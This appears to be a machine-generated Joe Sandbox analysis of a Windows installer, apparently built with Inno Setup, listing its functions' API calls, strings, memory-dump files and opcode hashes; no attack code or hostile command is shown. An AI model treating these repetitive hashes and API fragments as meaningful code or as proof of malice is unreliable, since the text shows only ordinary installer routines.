                                                              • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                              • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                              • String ID:
                                                              • API String ID: 3808407030-0
                                                              • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                              • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                              • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                              • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                              Function 00414800 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                              • Instruction ID: a833d86c80f2fb81cba799e3b93fc1891ddf3ebdd98a67124a25423b7ab76754
                                                              • Opcode Fuzzy Hash: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
                                                              • Instruction Fuzzy Hash: 563132746057809FC320EF69C984B9BB7E8AF89354F04491EF9D5C3752C638E8818F19
                                                              Function 004297CC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429808
                                                              • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429837
                                                              • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429853
                                                              • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042987E
                                                              • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 0042989C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                              • Instruction ID: 8b65b0e689063cc909dba6714575951256d1ad54ff8cece17fd29570ea6901c2
                                                              • Opcode Fuzzy Hash: 399f588db94bb8b810bf5b46e1237ea7bfd7cbebe0e15a3dbf36720fb68daebb
                                                              • Instruction Fuzzy Hash: 6E219D707107057BEB10AB62DC82F5B7AECAB41708F54443EB501AB2D2DFB8AE418228
                                                              Function 0041BBB8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemMetrics.USER32(0000000B), ref: 0041BBCA
                                                              • GetSystemMetrics.USER32(0000000C), ref: 0041BBD4
                                                              • GetDC.USER32(00000000), ref: 0041BC12
                                                              • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BC59
                                                              • DeleteObject.GDI32(00000000), ref: 0041BC9A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MetricsSystem$BitmapCreateDeleteObject
                                                              • String ID:
                                                              • API String ID: 1095203571-0
                                                              • Opcode ID: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                              • Instruction ID: 2a907a32995036c4e239f44386a828d3a2f1e7d44945ead90e55d18394f4d4ff
                                                              • Opcode Fuzzy Hash: d6ecec59309c4539c21f746b1d4641e0a999657a412e1d938322a226e3514674
                                                              • Instruction Fuzzy Hash: 5D315C70E00208EFDB04DFA5C941AAEB7F5EB48700F2084AAF514AB781D7789E40DB98
                                                              Function 004735D8 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0045D04C: SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 00473665
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,004736AC,?,?,0049C1E0,00000000), ref: 0047367B
                                                              Strings
                                                              • Setting permissions on registry key: %s\%s, xrefs: 0047362A
                                                              • Could not set permissions on the registry key because it currently does not exist., xrefs: 0047366F
                                                              • Failed to set permissions on registry key (%d)., xrefs: 0047368C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID: Could not set permissions on the registry key because it currently does not exist.$Failed to set permissions on registry key (%d).$Setting permissions on registry key: %s\%s
                                                              • API String ID: 1452528299-4018462623
                                                              • Opcode ID: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                              • Instruction ID: ad6b00cc897a6d1501f3fc6a2a631de3da5dc8c6e7b4eccdfad28332e4495c63
                                                              • Opcode Fuzzy Hash: 2cd14b75b874af61ac3d45831295ca4897b993e1bd4af745d48f10d6dc1171d0
                                                              • Instruction Fuzzy Hash: A121C870A046445FCB10DFA9C8826EEBBE4DF49319F50817BE408E7392D7785E098B6D
                                                              Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                              • SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
                                                              • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocString
                                                              • String ID:
                                                              • API String ID: 262959230-0
                                                              • Opcode ID: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                              • Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
                                                              • Opcode Fuzzy Hash: dcd45591e65b03bd276bb2a5b0fabad56ebf76f0c081827c2345b0a7b763a240
                                                              • Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D
                                                              Function 004143E0 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SelectPalette.GDI32(00000000,00000000,00000000), ref: 00414419
                                                              • RealizePalette.GDI32(00000000), ref: 00414421
                                                              • SelectPalette.GDI32(00000000,00000000,00000001), ref: 00414435
                                                              • RealizePalette.GDI32(00000000), ref: 0041443B
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00414446
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Palette$RealizeSelect$Release
                                                              • String ID:
                                                              • API String ID: 2261976640-0
                                                              • Opcode ID: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                              • Instruction ID: 3cc421e061c7a323c9855e33cbe13bf4890882f9e8533d15179bd5f7679f66d2
                                                              • Opcode Fuzzy Hash: c9c8aa66f6917016d7555c0ac5b3df2d15848593dde74026b2272496f15e705b
                                                              • Instruction Fuzzy Hash: A2018F7520C3806AE600A63D8C85A9F6BED9FCA718F15446EF495DB282DA7AC8018765
                                                              Function 00424CE0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041F074: GetActiveWindow.USER32 ref: 0041F077
                                                                • Part of subcall function 0041F074: GetCurrentThreadId.KERNEL32 ref: 0041F08C
                                                                • Part of subcall function 0041F074: EnumThreadWindows.USER32(00000000,Function_0001F050), ref: 0041F092
                                                                • Part of subcall function 004231A8: GetSystemMetrics.USER32(00000000), ref: 004231AA
                                                              • OffsetRect.USER32(?,?,?), ref: 00424DC9
                                                              • DrawTextA.USER32(00000000,00000000,000000FF,?,00000C10), ref: 00424E8C
                                                              • OffsetRect.USER32(?,?,?), ref: 00424E9D
                                                                • Part of subcall function 00423564: GetCurrentThreadId.KERNEL32 ref: 00423579
                                                                • Part of subcall function 00423564: SetWindowsHookExA.USER32(00000003,00423520,00000000,00000000), ref: 00423589
                                                                • Part of subcall function 00423564: CreateThread.KERNEL32(00000000,000003E8,004234D0,00000000,00000000), ref: 004235AD
                                                                • Part of subcall function 00424B2C: SetTimer.USER32(00000000,00000001,?,004234B4), ref: 00424B47
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Thread$CurrentOffsetRectWindows$ActiveCreateDrawEnumHookMetricsSystemTextTimerWindow
                                                              • String ID: vLB
                                                              • API String ID: 1477829881-1797516613
                                                              • Opcode ID: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                              • Instruction ID: 1a85cd152e58b5c2614c87f396891e2b5808bef0cf689969089b0637ec596c27
                                                              • Opcode Fuzzy Hash: af4d35ceb7da7411f9a909d8da5f62e109762c4c9dbecdeb02cfa42cc05a337b
                                                              • Instruction Fuzzy Hash: C5812675A003188FCB14DFA8D880ADEBBF4FF88314F50416AE905AB296E738AD45CF44
                                                              Function 00406FA4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 156shareCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WNetGetUniversalNameA.MPR(00000000,00000001,?,00000400), ref: 00407003
                                                              • WNetOpenEnumA.MPR(00000001,00000001,00000000,00000000,?), ref: 0040707D
                                                              • WNetEnumResourceA.MPR(?,FFFFFFFF,?,?), ref: 004070D5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Enum$NameOpenResourceUniversal
                                                              • String ID: Z
                                                              • API String ID: 3604996873-1505515367
                                                              • Opcode ID: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                              • Instruction ID: 78f4b6eea80f90a9c0d6dbacb1000d6f5057f9b0a0312f2c839bfa0eabc808a5
                                                              • Opcode Fuzzy Hash: a9e747af3270ad6827a26b5e12e82ea9da9777e5f51a79d453bfa0d7b97e4fbe
                                                              • Instruction Fuzzy Hash: 14516470E04208AFDB11DF95C951AAFBBB9EF09304F1045BAE500BB3D1D778AE458B5A
                                                              Function 0044CFC0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetRectEmpty.USER32(?), ref: 0044D04E
                                                              • DrawTextA.USER32(00000000,00000000,00000000,?,00000D20), ref: 0044D079
                                                              • DrawTextA.USER32(00000000,00000000,00000000,00000000,00000800), ref: 0044D101
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DrawText$EmptyRect
                                                              • String ID:
                                                              • API String ID: 182455014-2867612384
                                                              • Opcode ID: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                              • Instruction ID: ac611c4ae9e9b4e435f74cd3b872a097dcdbbef8ea8fa2dc8c743a2ef399c877
                                                              • Opcode Fuzzy Hash: 9cefa38d4a8adbc35dceb9fbd70f94003a2f7c245499b58eac7a7a86e34dc042
                                                              • Instruction Fuzzy Hash: 18517171E00248AFDB11DFA5C885BDEBBF8BF48308F18447AE845EB252D7789945CB64
                                                              Function 0042EF74 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0042EF9E
                                                                • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                              • SelectObject.GDI32(?,00000000), ref: 0042EFC1
                                                              • ReleaseDC.USER32(00000000,?), ref: 0042F0A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateFontIndirectObjectReleaseSelect
                                                              • String ID: ...\
                                                              • API String ID: 3133960002-983595016
                                                              • Opcode ID: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                              • Instruction ID: de545d42c11d103cbad381cc3223c2b5efa9fdb4a6e9ae4bb0445229962d8c70
                                                              • Opcode Fuzzy Hash: 174dea87e3c77845355dc2bffde9c2636390ac865bcfddee608935e642ca7c05
                                                              • Instruction Fuzzy Hash: 5A316370B00128AFDB11EB96D841BAEB7F8EB09348F90447BE410A7392D7785E49CA59
                                                              Function 00416410 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                              • UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                              • RegisterClassA.USER32(?), ref: 004164CE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Class$InfoRegisterUnregister
                                                              • String ID: @
                                                              • API String ID: 3749476976-2766056989
                                                              • Opcode ID: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                              • Instruction ID: c77080f262680b7bd3c4c6a37e0a11d074b1995aa9dd52ebf92fb76dd285a693
                                                              • Opcode Fuzzy Hash: 32c7bff64fe8078beb5c73cee1a3f36bf3645a98757bc26b4be27a2261280048
                                                              • Instruction Fuzzy Hash: B8316D702042409BD720EF69C981B9B77E5AB89308F04457FF949DB392DB39DD44CB6A
                                                              Function 00498210 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesA.KERNEL32(00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 00498280
                                                              • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00498B60,00000000,00498306,?,?,00000000,0049B628), ref: 004982A9
                                                              • MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 004982C2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$Move
                                                              • String ID: isRS-%.3u.tmp
                                                              • API String ID: 3839737484-3657609586
                                                              • Opcode ID: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                              • Instruction ID: fc33356634acd7bce8b4c2965ae56e8bcff63ef6fc68eceab8a95db248f88364
                                                              • Opcode Fuzzy Hash: 6425da845d9cf075168c9006b2f4cde8adeeb665172db9fe24e9d2d56fbf6a76
                                                              • Instruction Fuzzy Hash: 0B216471E00609ABCF10EFA9C8819AFBBB8AF45714F10457FB814B72D1DB389E018A59
                                                              Function 00404D2A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00404DC5
                                                              • ExitProcess.KERNEL32 ref: 00404E0D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ExitMessageProcess
                                                              • String ID: Error$Runtime error at 00000000
                                                              • API String ID: 1220098344-2970929446
                                                              • Opcode ID: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                              • Instruction ID: e2df0dcbf1ce8e07228a8ae3c957e3f7be2bf5582065763199918d440bd3f461
                                                              • Opcode Fuzzy Hash: 4aa0907dffceb0697d192a833af99b379258e6819ee5eddde657f3822e72bbb6
                                                              • Instruction Fuzzy Hash: 8E219560A442414ADB11A779BA8571B3B91D7E5348F04817BE710A73E3C77C8C4487ED
                                                              Function 00456BFC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042C804: GetFullPathNameA.KERNEL32(00000000,00001000,?), ref: 0042C828
                                                                • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                              • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 00456C50
                                                              • RegisterTypeLib.OLEAUT32(00000000,00000000,00000000), ref: 00456C7D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Type$AllocByteCharFullLoadMultiNamePathRegisterStringWide
                                                              • String ID: LoadTypeLib$RegisterTypeLib
                                                              • API String ID: 1312246647-2435364021
                                                              • Opcode ID: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                              • Instruction ID: 3ed1135b8019c5f4588910a0035f5c9e1cabb82a18fedb82429c118dce795412
                                                              • Opcode Fuzzy Hash: 99adc2ab1761f2fa15f1ac99c5dc87c93e60f5f8f6cafab150dd189b668492eb
                                                              • Instruction Fuzzy Hash: 2911B430B00604AFDB02EFA6CD51A5EB7BDEB89705F5184B6FC44D3752DA389904CA24
                                                              Function 00457154 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(00000000,00000B06,00000000,00000000), ref: 0045716E
                                                              • SendMessageA.USER32(00000000,00000B00,00000000,00000000), ref: 0045720B
                                                              Strings
                                                              • Failed to create DebugClientWnd, xrefs: 004571D4
                                                              • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 0045719A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
